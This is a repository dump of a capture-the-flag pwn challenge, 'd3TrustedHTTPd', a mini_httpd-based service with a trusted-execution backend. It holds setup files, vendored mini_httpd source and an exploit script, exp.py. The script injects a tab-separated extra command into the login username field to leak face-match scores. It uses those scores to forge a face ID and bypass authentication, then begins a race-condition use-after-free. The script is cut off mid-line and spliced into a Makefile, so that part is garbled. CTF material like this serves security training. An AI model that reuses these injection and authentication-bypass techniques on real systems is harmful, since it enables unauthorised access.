├── README.md
├── attachment
│   ├── Image
│   ├── README.md
│   ├── bl1.bin
│   ├── bl2.bin
│   ├── bl31.bin
│   ├── bl32.bin
│   ├── bl32_extra1.bin
│   ├── bl32_extra2.bin
│   ├── bl33.bin
│   ├── rootfs.cpio.gz
│   └── run.sh
├── exp.py
├── src
│   └── d3_trusted_core
│       ├── Android.mk
│       ├── CMakeLists.txt
│       ├── Makefile
│       ├── host
│       │   ├── Makefile
│       │   └── main.c
│       ├── mini_httpd-1.30
│       │   ├── .vscode
│       │   │   └── settings.json
│       │   ├── FILES
│       │   ├── Makefile
│       │   ├── Makefile.bak
│       │   ├── README
│       │   ├── contrib
│       │   │   └── redhat-rpm
│       │   │       ├── mini_httpd.init
│       │   │       └── mini_httpd.spec
│       │   ├── htpasswd.1
│       │   ├── htpasswd.c
│       │   ├── index.html
│       │   ├── match.c
│       │   ├── match.h
│       │   ├── mime_encodings.txt
│       │   ├── mime_types.txt
│       │   ├── mini_httpd.8
│       │   ├── mini_httpd.c
│       │   ├── mini_httpd.cnf
│       │   ├── port.h
│       │   ├── scripts
│       │   │   ├── 500.mini_httpd-rotate
│       │   │   ├── mini_httpd.sh
│       │   │   └── mini_httpd_wrapper
│       │   ├── tdate_parse.c
│       │   ├── tdate_parse.h
│       │   ├── version.h
│       │   └── www
│       │       ├── bootstrap-treeview.min.css
│       │       ├── bootstrap-treeview.min.js
│       │       ├── index.html
│       │       ├── login.html
│       │       ├── manager.html
│       │       ├── secfs.html
│       │       └── weights
│       │           ├── age_gender_model-shard1
│       │           ├── age_gender_model-weights_manifest.json
│       │           ├── face_expression_model-shard1
│       │           ├── face_expression_model-weights_manifest.json
│       │           ├── face_landmark_68_model-shard1
│       │           ├── face_landmark_68_model-weights_manifest.json
│       │           ├── face_landmark_68_tiny_model-shard1
│       │           ├── face_landmark_68_tiny_model-weights_manifest.json
│       │           ├── face_recognition_model-shard1
│       │           ├── face_recognition_model-shard2
│       │           ├── face_recognition_model-weights_manifest.json
│       │           ├── mtcnn_model-shard1
│       │           ├── mtcnn_model-weights_manifest.json
│       │           ├── ssd_mobilenetv1_model-shard1
│       │           ├── ssd_mobilenetv1_model-shard2
│       │           ├── ssd_mobilenetv1_model-weights_manifest.json
│       │           ├── tiny_face_detector_model-shard1
│       │           └── tiny_face_detector_model-weights_manifest.json
│       └── ta
│           ├── Android.mk
│           ├── Makefile
│           ├── d3_trusted_core.c
│           ├── include
│           │   └── d3_trusted_core_ta.h
│           ├── sub.mk
│           └── user_ta_header_defines.h
└── writeup en-US.md

/README.md:
--------------------------------------------------------------------------------
# d3TrustedHTTPd

Trust me or not, you will never be able to break it~

Address: `http://{ip}:{port}/`

Author: Eqqie @ D^3CTF

# Writeup

[writeup en-US](https://github.com/yikesoftware/d3ctf-2022-pwn-d3TrustedHTTPd/blob/main/writeup%20en-US.md)

--------------------------------------------------------------------------------
/attachment/Image:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/attachment/Image

--------------------------------------------------------------------------------
/attachment/README.md:
--------------------------------------------------------------------------------
# d3TrustedHttpd

## Desc

Trust me or not, you will never be able to break it.

Address: `http://{ip}:{port}/`

## Run

1. Download and build QEMU 7.2.0:

```shell
wget https://download.qemu.org/qemu-7.2.0.tar.xz
tar xvJf qemu-7.2.0.tar.xz
cd qemu-7.2.0
./configure --target-list=aarch64-softmmu --enable-slirp --disable-spice-protocol
make -j `nproc`
# make install
```

2. Run QEMU with `./run.sh`.

3. Access challenge from `http://localhost:8080`.

## Notice

1. Some of the sensitive data embedded in the firmware is different from the remote, so please check through the remote environment.

2. Please destroy and re-create a new environment at the competition platform, if the key service is abnormal.

3. Please do not launch any kind of DDoS attack except for the interaction needed to complete the challenge.

4. If you have other questions please ask for help in the online group.

## Author

Eqqie @ D^3CTF

--------------------------------------------------------------------------------
/attachment/bl1.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/attachment/bl1.bin

--------------------------------------------------------------------------------
/attachment/bl2.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/attachment/bl2.bin

--------------------------------------------------------------------------------
/attachment/bl31.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/attachment/bl31.bin

--------------------------------------------------------------------------------
/attachment/bl32.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/attachment/bl32.bin

--------------------------------------------------------------------------------
/attachment/bl32_extra1.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/attachment/bl32_extra1.bin

--------------------------------------------------------------------------------
/attachment/bl32_extra2.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/attachment/bl32_extra2.bin

--------------------------------------------------------------------------------
/attachment/bl33.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/attachment/bl33.bin

--------------------------------------------------------------------------------
/attachment/rootfs.cpio.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/attachment/rootfs.cpio.gz

--------------------------------------------------------------------------------
/attachment/run.sh:
--------------------------------------------------------------------------------
#!/bin/sh

qemu-system-aarch64 \
    -nographic \
    -smp 2 \
    -monitor /dev/null \
    -machine virt,secure=on,mte=off,gic-version=3,virtualization=false \
    -cpu max,pauth-impdef=on \
    -semihosting-config enable=on,target=native \
    -m 1057 \
    -bios bl1.bin \
    -initrd ./rootfs.cpio.gz \
    -kernel ./Image -no-acpi \
    -append 'console=ttyAMA0,38400 keep_bootcon root=/dev/vda2' \
    -object rng-random,filename=/dev/urandom,id=rng0 \
    -device virtio-rng-pci,rng=rng0,max-bytes=1024,period=1000 \
    -net user,hostfwd=tcp::8080-:8080 -net nic \
    -no-reboot

--------------------------------------------------------------------------------
/exp.py:
--------------------------------------------------------------------------------
from pwn import *
from urllib.parse import urlencode, quote
import threading
import sys
import json
import struct
import os
import time

context.arch = "aarch64"
context.log_level = "debug"

if len(sys.argv) != 3:
    print("python3 exp.py ip port")
ip = sys.argv[1]
port = int(sys.argv[2])

def get_conn():
    return remote(ip, port)

def make_post_request(path, body, session_id=None):
    if isinstance(session_id, str):
        session_id = session_id.encode()
    if isinstance(body, str):
        body = body.encode()
    p = get_conn()
    req = b"POST " + path.encode() + b" HTTP/1.1\r\n"
    req += b"Content-Length: "+ str(len(body)).encode() + b"\r\n"
    if session_id:
        req += b"Cookie: session_id="+ session_id + b";\r\n"
    req += b"\r\n"
    req += body
    p.send(req)
    return p

def leak_similarity(face_data:list):
    done = 0
    similarity = 0.0
    while(done == 0):
        try:
            body = f"auth_mode=face_id&username=eqqie%09get_similarity&face_data={str(face_data)}".encode()
            p = make_post_request("/api/login", body)
            p.recvuntil(b"HTTP/1.1 ")
            if(p.recv(3) == b"400"):
                print("Try leak again...")
                p.close()
                done = 0
                continue
            p.recvuntil(b"session_id=")
            leak = p.recvuntil(b"; ", drop=True).decode()
            p.close()
            similarity = float(leak)
            done = 1
        except KeyboardInterrupt:
            print("KeyboardInterrupt")
            sys.exit(0)
        except Exception as e:
            print("leak error:", e)
            p.close()
    return similarity

def login_by_face(face_data:list):
    args = {
        "auth_mode": "face_id",
        "username": "eqqie",
        "face_data": str(face_data)
    }
    body = urlencode(args).encode()
    p = make_post_request("/api/login", body)
    p.recvuntil(b"session_id=")
    session_id = p.recvuntil(b"; Path", drop=True).decode()
    p.close()
    return session_id

def login_by_passwd(username, password):
    args = {
        "auth_mode": "passwd",
        "username": username,
        "password": password
    }
    body = urlencode(args).encode()
    try:
        p = make_post_request("/api/login", body)
        p.recvuntil(b"session_id=")
        session_id = p.recvuntil(b"; Path", drop=True).decode()
        p.close()
    except:
        print("no session!")
        session_id = None
    return session_id

def disable_user(session_id, user):
    if isinstance(session_id, str):
        session_id = session_id.encode()
    args = {
        "username": user
    }
    body = urlencode(args).encode()
    p = make_post_request("/api/man/user/disable", body, session_id)
    p.recv()
    p.close()

def enable_user(session_id, user):
    if isinstance(session_id, str):
        session_id = session_id.encode()
    args = {
        "username": user
    }
    body = urlencode(args).encode()
    p = make_post_request("/api/man/user/enable", body, session_id)
    p.recv()
    p.close()

def reset_user(session_id, user, face_data=None):
    if isinstance(session_id, str):
        session_id = session_id.encode()
    if not face_data:
        args = {
            "username": user
        }
    else:
        args = {
            "username": user,
            "option": "set_face_id",
            "face_data": str(face_data)
        }
    body = urlencode(args).encode()
    p = make_post_request("/api/man/user/reset", body, session_id)
    p.recv()
    p.close()

def test_race_resule(session_id):
    if isinstance(session_id, str):
        session_id = session_id.encode()
    p = make_post_request("/api/user", b"", session_id)
    p.recvuntil(b"HTTP/1.1 ")
    http_status = p.recv(3)
    p.close()
    if http_status == b"200":
        return 0
    elif http_status == b"403":
        remain = p.recv()
        if b"Disabled User" in remain:
            return 2
        else:
            return 1

def user_info(session_id):
    if isinstance(session_id, str):
        session_id = session_id.encode()
    p = make_post_request("/api/user", b"", session_id)
    p.recvuntil(b"HTTP/1.1 ")
    http_status = p.recv(3)
    if http_status == b"200":
        try:
            p.recvuntil(b"Connection: close\r\n\r\n")
            p.close()
            json_data = p.recvall().decode()
            return json.loads(json_data)
        except:
            p.close()
            return None
    else:
        p.close()
        return None

def secfs_file_man(action: str, session_id: str, **kwargs):
    print(f"[*] secfs_file_man: action [{action}] with args [{kwargs}]")
    if isinstance(session_id, str):
        session_id = session_id.encode()
    if action == "create":
        body = f"filename={kwargs['filename']}&data={kwargs['data']}&parent_id={kwargs['parent_id']}".encode()
        p = make_post_request("/api/secfs/file/create", body, session_id)
        p.recvuntil(b"\r\n\r\n")
        ret_data = p.recv()
        p.close()
    elif action == "delete":
        body = f"ext_id={kwargs['ext_id']}&del_mode={kwargs['del_mode']}".encode()
        p = make_post_request("/api/secfs/file/delete", body, session_id)
        p.recvuntil(b"\r\n\r\n")
        ret_data = p.recv()
        p.close()
    elif action == "info":
        body = f"ext_id={kwargs['ext_id']}".encode()
        p = make_post_request("/api/secfs/file/info", body, session_id)
        p.recvuntil(b"\r\n\r\n")
        ret_data = p.recv()
        p.close()
    elif action == "read":
        body = f"ext_id={kwargs['ext_id']}".encode()
        p = make_post_request("/api/secfs/file/read", body, session_id)
        ret_data = p.recv()
        p.close()
    elif action == "rename":
        body = f"ext_id={kwargs['ext_id']}&new_filename={kwargs['new_filename']}".encode()
        p = make_post_request("/api/secfs/file/rename", body, session_id)
        p.recvuntil(b"\r\n\r\n")
        ret_data = p.recv()
        p.close()
    elif action == "update":
        body = f"ext_id={kwargs['ext_id']}&data={kwargs['data']}".encode()
        p = make_post_request("/api/secfs/file/update", body, session_id)
        p.recvuntil(b"\r\n\r\n")
        ret_data = p.recv()
        p.close()
    elif action == "slots":
        p = make_post_request("/api/secfs/file/slots", b"", session_id)
        p.recvuntil(b"\r\n\r\n")
        ret_data = p.recv()
        p.close()
    else:
        return None
    return ret_data

def secfs_dir_man(action: str, session_id: str, **kwargs):
    print(f"[*] secfs_dir_man: action [{action}] with args [{kwargs}]")
    if isinstance(session_id, str):
        session_id = session_id.encode()
    if action == "create":
        body = f"parent_id={kwargs['parent_id']}&dir_name={kwargs['dir_name']}".encode()
        p = make_post_request("/api/secfs/dir/create", body, session_id)
        p.recvuntil(b"\r\n\r\n")
        ret_data = p.recv()
        p.close()
    elif action == "delete":
        body = f"ext_id={kwargs['ext_id']}&rm_mode={kwargs['rm_mode']}".encode()
        p = make_post_request("/api/secfs/dir/delete", body, session_id)
        p.recvuntil(b"\r\n\r\n")
        ret_data = p.recv()
        p.close()
    elif action == "info":
        body = f"ext_id={kwargs['ext_id']}".encode()
        p = make_post_request("/api/secfs/dir/info", body, session_id)
        p.recvuntil(b"\r\n\r\n")
        ret_data = p.recv()
        p.close()
    else:
        return None
    return ret_data

def forge_face_id(size:int):
    fake_face = [0.0 for _ in range(size)]
    rounds = 0
    total_max = 0.0
    delta = 0.025
    burp_range = 20
    while True:
        for i in range(size):
            local_max = 0.0
            max_index = 0
            for j in range(-burp_range, burp_range):
                rounds += 1
                fake_face[i] = j * delta
                print(fake_face)
                curr = leak_similarity(fake_face)
                if curr >= local_max:
                    local_max = curr
                    max_index = j
                else:
                    break
            fake_face[i] = max_index * delta
            total_max = leak_similarity(fake_face)
            time.sleep(0.01)
        if total_max > 0.85:
            print("Success!")
            break
        else:
            print("Fail!")
            return None
    print(f"Final similarity = {total_max}, rounds = {rounds}")
    return fake_face


class MyThread(threading.Thread):
    def __init__(self, func, args=()):
        super(MyThread, self).__init__()
        self.func = func
        self.args = args
    def run(self):
        self.result = self.func(*self.args)
    def get_result(self):
        threading.Thread.join(self)
        try:
            return self.result
        except Exception:
            return None

def race_and_uaf(session_id):
    uaf_face_data = [1.0]*128
    uaf_face_data[88] = struct.unpack("
 mime_encodings.h \
	  -e 's/#.*//' -e 's/[ ]*$$//' -e '/^$$/d' \
	  -e 's/[ ][ ]*/", 0, "/' -e 's/^/{ "/' -e 's/$$/", 0 },/'

mime_types.h: mime_types.txt
	rm -f mime_types.h
	sed < mime_types.txt > mime_types.h \
	  -e 's/#.*//' -e 's/[ ]*$$//' -e '/^$$/d' \
	  -e 's/[ ][ ]*/", 0, "/' -e 's/^/{ "/' -e 's/$$/", 0 },/'


htpasswd: htpasswd.o
	$(CC) $(LDFLAGS) htpasswd.o $(CRYPT_LIB) -o htpasswd

htpasswd.o: htpasswd.c
	$(CC) $(CFLAGS) -c htpasswd.c


cert: mini_httpd.pem
mini_httpd.pem: mini_httpd.cnf
	openssl req -new -x509 -days 3650 -nodes -config mini_httpd.cnf -out mini_httpd.pem -keyout mini_httpd.pem
	openssl x509 -subject -dates -fingerprint -noout -in mini_httpd.pem
	chmod 600 mini_httpd.pem

clean:
	rm -f mini_httpd mime_encodings.h mime_types.h htpasswd mini_httpd.rnd *.o core core.* *.core

tar:
	@name=`sed -n -e '/#define SERVER_SOFTWARE /!d' -e 's,.*mini_httpd/,mini_httpd-,' -e 's, .*,,p' version.h` ; \
	  rm -rf $$name ; \
	  mkdir $$name ; \
	  tar cf - `cat FILES` | ( cd $$name ; tar xfBp - ) ; \
	  chmod 644 $$name/Makefile $$name/mime_encodings.txt $$name/mime_types.txt ; \
	  chmod 755 $$name/contrib $$name/contrib/redhat-rpm ; \
	  tar cf $$name.tar $$name ; \
	  rm -rf $$name ; \
	  gzip $$name.tar

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/Makefile.bak:
--------------------------------------------------------------------------------
# Makefile for mini_httpd

# CONFIGURE: If you are using a SystemV-based operating system, such as
# Solaris, you will need to uncomment this definition.
#SYSV_LIBS = -lnsl -lsocket

# CONFIGURE: Some systems don't need -lcrypt, and indeed they get an
# error if you try to link with it. If you get an error about libcrypt
# not found, try commenting out this definition.
CRYPT_LIB = -lcrypt

# CONFIGURE: If you want to compile in support for https, uncomment these
# definitions. You will need to have already built OpenSSL, available at
# http://www.openssl.org/ Make sure the SSL_TREE definition points to the
# tree with your OpenSSL installation - depending on how you installed it,
# it may be in /usr/local instead of /usr/local/ssl.
#SSL_TREE = /usr/local/ssl
#SSL_DEFS = -DUSE_SSL
#SSL_INC = -I$(SSL_TREE)/include
#SSL_LIBS = -L$(SSL_TREE)/lib -lssl -lcrypto


BINDIR = /usr/local/sbin
MANDIR = /usr/local/man
#CC = cc
CC = /home/eqqie/XDSEC/D3CTF/d3TrustedHttpd/optee_build/toolchains/aarch64/bin/aarch64-linux-gnu-gcc
CDEFS = $(SSL_DEFS) $(SSL_INC)
CFLAGS = -O $(CDEFS) -Wall -Wpointer-arith -Wshadow -Wcast-qual -Wcast-align -Wstrict-prototypes -Wmissing-prototypes -Wmissing-declarations -Wredundant-decls -Wno-long-long
LDFLAGS = -s
LDLIBS = $(CRYPT_LIB) $(SSL_LIBS) $(SYSV_LIBS)

all: mini_httpd htpasswd

mini_httpd: mini_httpd.o match.o tdate_parse.o
	$(CC) $(LDFLAGS) mini_httpd.o match.o tdate_parse.o $(LDLIBS) -o mini_httpd

mini_httpd.o: mini_httpd.c version.h port.h match.h tdate_parse.h mime_encodings.h mime_types.h
	$(CC) $(CFLAGS) -c mini_httpd.c

match.o: match.c match.h
	$(CC) $(CFLAGS) -c match.c

tdate_parse.o: tdate_parse.c tdate_parse.h
	$(CC) $(CFLAGS) -c tdate_parse.c

mime_encodings.h: mime_encodings.txt
	rm -f mime_encodings.h
	sed < mime_encodings.txt > mime_encodings.h \
	  -e 's/#.*//' -e 's/[ ]*$$//' -e '/^$$/d' \
	  -e 's/[ ][ ]*/", 0, "/' -e 's/^/{ "/' -e 's/$$/", 0 },/'

mime_types.h: mime_types.txt
	rm -f mime_types.h
	sed < mime_types.txt > mime_types.h \
	  -e 's/#.*//' -e 's/[ ]*$$//' -e '/^$$/d' \
	  -e 's/[ ][ ]*/", 0, "/' -e 's/^/{ "/' -e 's/$$/", 0 },/'


htpasswd: htpasswd.o
	$(CC) $(LDFLAGS) htpasswd.o $(CRYPT_LIB) -o htpasswd

htpasswd.o: htpasswd.c
	$(CC) $(CFLAGS) -c htpasswd.c


cert: mini_httpd.pem
mini_httpd.pem: mini_httpd.cnf
	openssl req -new -x509 -days 3650 -nodes -config mini_httpd.cnf -out mini_httpd.pem -keyout mini_httpd.pem
	openssl x509 -subject -dates -fingerprint -noout -in mini_httpd.pem
	chmod 600 mini_httpd.pem


install: all
	rm -f $(BINDIR)/mini_httpd $(BINDIR)/htpasswd
	-mkdir -p $(BINDIR)
	cp mini_httpd htpasswd $(BINDIR)
	rm -f $(MANDIR)/man8/mini_httpd.8 $(MANDIR)/man1/htpasswd.1
	-mkdir -p $(MANDIR)/man8
	cp mini_httpd.8 $(MANDIR)/man8
	-mkdir -p $(MANDIR)/man1
	cp htpasswd.1 $(MANDIR)/man1

clean:
	rm -f mini_httpd mime_encodings.h mime_types.h htpasswd mini_httpd.rnd *.o core core.* *.core

tar:
	@name=`sed -n -e '/#define SERVER_SOFTWARE /!d' -e 's,.*mini_httpd/,mini_httpd-,' -e 's, .*,,p' version.h` ; \
	  rm -rf $$name ; \
	  mkdir $$name ; \
	  tar cf - `cat FILES` | ( cd $$name ; tar xfBp - ) ; \
	  chmod 644 $$name/Makefile $$name/mime_encodings.txt $$name/mime_types.txt ; \
	  chmod 755 $$name/contrib $$name/contrib/redhat-rpm ; \
	  tar cf $$name.tar $$name ; \
	  rm -rf $$name ; \
	  gzip $$name.tar

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/README:
--------------------------------------------------------------------------------
mini_httpd - small HTTP server
version 1.30 of 26Oct2018

mini_httpd is a small HTTP server. Its performance is not great, but for
low or medium traffic sites it's quite adequate. It implements all the
basic features of an HTTP server, including:

  * GET, HEAD, and POST methods.
  * CGI.
  * Basic authentication.
  * Security against ".." filename snooping.
  * The common MIME types.
  * Trailing-slash redirection.
  * index.html, index.htm, index.cgi
  * Directory listings.
  * Multihoming / virtual hosting.
  * Standard logging.
  * Custom error pages.

It can also be configured to do SSL/HTTPS.

mini_httpd was written for a couple reasons. One, as an experiment
to see just how slow an old-fashioned forking web server would be
with today's operating systems. The answer is, surprisingly, not
that slow - on FreeBSD 3.2, mini_httpd benchmarks at about 90% the
speed of Apache. The other main reason for writing mini_httpd was
to get a simple platform for experimenting with new web server
technology, for instance SSL.

See the manual entry for more details.

Files in this distribution:

    README           this
    Makefile         guess
    mini_httpd.c     source file for server
    mini_httpd.8     manual entry for server
    version.h        version defines
    port.h           portability defines
    mime_types.txt   list of MIME types
    htpasswd.c       source file for password changer
    htpasswd.1       manual entry for password changer
    index.html       sample index file

To build: If you're on a SysV-like machine (which includes old Linux systems
but not new Linux systems), edit the Makefile and uncomment the SYSVLIBS line.
If you're doing SSL, uncomment those lines too. Otherwise, just do a make.

On Red Hat Linux systems you can use RPM to install mini_httpd, like so:
    cd /usr/src/redhat/SOURCES
    wget http://www.acme.com/software/mini_httpd/mini_httpd-1.30.tar.gz
    rpm -ta mini_httpd-1.30.tar.gz
    rpm -i /usr/src/redhat/RPMS/i386/mini_httpd-1.30-1.i386.rpm

Feedback is welcome - send bug reports, enhancements, checks, money
orders, etc. to the addresses below.

    Jef Poskanzer  jef@mail.acme.com  http://www.acme.com/jef/

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/contrib/redhat-rpm/mini_httpd.init:
--------------------------------------------------------------------------------
#!/bin/sh
# mini_httpd startup script
# Nelson Minar Thu Dec 30 13:54:31 PST 1999
# the following two lines added 2000-01-31 by Bennett Todd
# chkconfig: 2345 99 01
# description: control script for mini_httpd


# configuration options:

DOCROOT=/home/httpd/html
LOGFILE=/var/log/httpd/mini_httpd
PIDFILE=/var/run/mini_httpd.pid
HTTPD=/usr/bin/mini_httpd

. /etc/rc.d/init.d/functions

case "$1" in
start)
	if [ ! -d $DOCROOT ]; then
		echo "mini_httpd: $DOCROOT does not exist."
		exit 1;
	fi
	cd $DOCROOT
	action "Starting mini_httpd" $HTTPD -l $LOGFILE -i $PIDFILE;
	touch /var/lock/subsys/httpd
	;;

stop)
	echo -n "Stopping mini_httpd "
	killproc mini_httpd
	echo
	rm -f /var/lock/subsys/httpd $PIDFILE
	;;

status)
	status mini_httpd
	;;

restart|reload)
	$0 stop
	$0 start
	;;

*)
	echo "Usage: mini_httpd {start|stop|status|restart|reload}"
	;;
esac

exit 0

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/contrib/redhat-rpm/mini_httpd.spec:
--------------------------------------------------------------------------------
Summary: small, simple http daemon, supports SSL
Name: mini_httpd
Version: 1.30
Release: 1
Copyright: Freely Redistributable
Packager: Bennett Todd
Group: Networking/Daemons
URL: http://www.acme.com/software/mini_httpd/
Source: http://www.acme.com/software/mini_httpd-%{PACKAGE_VERSION}.tar.gz
BuildRoot: /var/tmp/mini_httpd-rpmbuild
Requires: openssl
%description

Simple and small HTTP daemon supporting SSL

%prep
%setup

%build
make SSL_INCDIR=/usr/include/openssl \
	SSL_LIBDIR=/usr/lib \
	SSL_DEFS=-DUSE_SSL \
	SSL_INC=-I/usr/include/openssl \
	SSL_LIBS='-lssl -lcrypto' \
	BINDIR=/usr/bin \
	MANDIR=/usr/man \
	CFLAGS='-g -DUSE_SSL -I/usr/include/openssl'

%install
mkdir -p $RPM_BUILD_ROOT/etc/rc.d/init.d
mkdir -p $RPM_BUILD_ROOT/usr/bin
mkdir -p $RPM_BUILD_ROOT/usr/man/man1
mkdir -p $RPM_BUILD_ROOT/usr/man/man8
mkdir -p $RPM_BUILD_ROOT/home/httpd/html
make BINDIR=$RPM_BUILD_ROOT/usr/bin \
	MANDIR=$RPM_BUILD_ROOT/usr/man \
	install
install index.html $RPM_BUILD_ROOT/home/httpd/html
install contrib/redhat-rpm/mini_httpd.init \
	$RPM_BUILD_ROOT/etc/rc.d/init.d/mini_httpd

%post
/sbin/chkconfig mini_httpd reset

%preun
/etc/rc.d/init.d/mini_httpd stop
/sbin/chkconfig --level 0123456 mini_httpd off

%files
%defattr(-,root,root)

/usr/bin/*
/home/httpd/html/index.html
%attr(0755,root,root) /etc/rc.d/init.d/mini_httpd
%doc /usr/man/*/*
%doc [A-Z]*


%changelog
* Sat Oct 18 2014 Version 1.21
* Thu Jan 08 2004 Version 1.20
* Mon Oct 27 2003 Version 1.19
* Sat Sep 13 2003 Version 1.18
* Sat May 25 2002 Version 1.17
* Mon May 07 2001 Version 1.16
* Tue May 01 2001 Version 1.15c
* Sat Apr 21 2001 Version 1.15b
* Wed Sep 20 2000 Version 1.15
* Thu Jun 15 2000 Version 1.14
* Fri May 26 2000 Version 1.13
* Wed Mar 01 2000 Version 1.12
* Sun Feb 06 2000 Version 1.11
* Wed Feb 02 2000 Version 1.10
* Mon Jan 31 2000 Version 1.09, added init script
* Wed Jan 19 2000 Version 1.08, reset release to 1
* Mon Dec 13 1999
- Added defattr to %files, bumped Release to 2
* Sat Dec 11 1999
- Bumped version to 19991210, switched source from oct to dec
* Fri Dec 10 1999
- Initial Wrap

--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/htpasswd.1:
--------------------------------------------------------------------------------
.TH htpasswd 1 "05 May 1998"
.SH NAME
htpasswd - manipulate HTTP-server password files
.SH SYNOPSIS
.B htpasswd
.RB [ -c ]
.I passwordfile
.I username
.SH DESCRIPTION
.PP
Sets a user's password in an httpd-style password file.
The -c flag creates a new file.
.SH AUTHOR
Rob McCool.
Modified 29aug97 by Jef Poskanzer to accept new password on stdin,
if stdin is a pipe or file. This is necessary for use from CGI.
--------------------------------------------------------------------------------
/src/d3_trusted_core/mini_httpd-1.30/htpasswd.c:
--------------------------------------------------------------------------------
/*
 * htpasswd.c: simple program for manipulating password file for NCSA httpd
 *
 * Rob McCool
 */

/* Modified 29aug97 by Jef Poskanzer to accept new password on stdin,
** if stdin is a pipe or file.  This is necessary for use from CGI.
*/

#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <signal.h>
#include <time.h>

#define LF 10
#define CR 13

#define MAX_STRING_LEN 256

int tfd;
char temp_template[] = "/tmp/htp.XXXXXX";

void interrupted(int);

static char * strd(char *s) {
    char *d;

    d=(char *)malloc(strlen(s) + 1);
    strcpy(d,s);
    return(d);
}

static void getword(char *word, char *line, char stop) {
    int x = 0,y;

    for(x=0;((line[x]) && (line[x] != stop));x++)
        word[x] = line[x];

    word[x] = '\0';
    if(line[x]) ++x;
    y=0;

    while((line[y++] = line[x++]));
}

static int my_getline(char *s, int n, FILE *f) {
    int i=0;

    while(1) {
        s[i] = (char)fgetc(f);

        if(s[i] == CR)
            s[i] = fgetc(f);

        if((s[i] == 0x4) || (s[i] == LF) || (i == (n-1))) {
            s[i] = '\0';
            return (feof(f) ? 1 : 0);
        }
        ++i;
    }
}

static void putline(FILE *f,char *l) {
    int x;

    for(x=0;l[x];x++) fputc(l[x],f);
    fputc('\n',f);
}


/* From local_passwd.c (C) Regents of Univ. of California blah blah */
static unsigned char itoa64[] =         /* 0 ... 63 => ascii - 64 */
    "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

static void to64(char *s, long v, int n) {
    while (--n >= 0) {
        *s++ = itoa64[v&0x3f];
        v >>= 6;
    }
}

#ifdef MPE
/* MPE lacks getpass() and a way to suppress stdin echo.  So for now, just
   issue the prompt and read the results with echo.  (Ugh). */

char *getpass(const char *prompt) {

    static char password[81];

    fputs(prompt,stderr);
    gets((char *)&password);

    if (strlen((char *)&password) > 8) {
        password[8]='\0';
    }

    return (char *)&password;
}
#endif

static void
add_password( char* user, FILE* f )
{
    char pass[100];
    char* pw;
    char* cpw;
    char salt[3];

    if ( ! isatty( fileno( stdin ) ) )
    {
        (void) fgets( pass, sizeof(pass), stdin );
        if ( pass[strlen(pass) - 1] == '\n' )
            pass[strlen(pass) - 1] = '\0';
        pw = pass;
    }
    else
    {
        pw = strd( (char*) getpass( "New password:" ) );
        if ( strcmp( pw, (char*) getpass( "Re-type new password:" ) ) != 0 )
        {
            (void) fprintf( stderr, "They don't match, sorry.\n" );
            if ( tfd != -1 )
                unlink( temp_template );
            exit( 1 );
        }
    }
    (void) srandom( (int) time( (time_t*) 0 ) );
    to64( &salt[0], random(), 2 );
    cpw = crypt( pw, salt );
    (void) fprintf( f, "%s:%s\n", user, cpw );
}

static void usage(void) {
    fprintf(stderr,"Usage: htpasswd [-c] passwordfile username\n");
    fprintf(stderr,"The -c flag creates a new file.\n");
    exit(1);
}

void interrupted(int signo) {
    fprintf(stderr,"Interrupted.\n");
    if(tfd != -1) unlink(temp_template);
    exit(1);
}

int main(int argc, char *argv[]) {
    FILE *tfp,*f;
    char user[MAX_STRING_LEN];
    char line[MAX_STRING_LEN];
    char l[MAX_STRING_LEN];
    char w[MAX_STRING_LEN];
    char command[MAX_STRING_LEN];
    int found;

    tfd = -1;
    signal(SIGINT,(void (*)(int))interrupted);
    if(argc == 4) {
        if(strcmp(argv[1],"-c"))
            usage();
        if(!(tfp = fopen(argv[2],"w"))) {
            fprintf(stderr,"Could not open passwd file %s for writing.\n",
                    argv[2]);
            perror("fopen");
            exit(1);
        }
        printf("Adding password for %s.\n",argv[3]);
        add_password(argv[3],tfp);
        fclose(tfp);
        exit(0);
    } else if(argc != 3) usage();

    tfd = mkstemp(temp_template);
    if(!(tfp = fdopen(tfd,"w"))) {
        fprintf(stderr,"Could not open temp file.\n");
        exit(1);
    }

    if(!(f = fopen(argv[1],"r"))) {
        fprintf(stderr,
                "Could not open passwd file %s for reading.\n",argv[1]);
        fprintf(stderr,"Use -c option to create new one.\n");
        exit(1);
    }
    strncpy(user,argv[2],sizeof(user)-1);
    user[sizeof(user)-1] = '\0';

    found = 0;
    while(!(my_getline(line,MAX_STRING_LEN,f))) {
        if(found || (line[0] == '#') || (!line[0])) {
            putline(tfp,line);
            continue;
        }
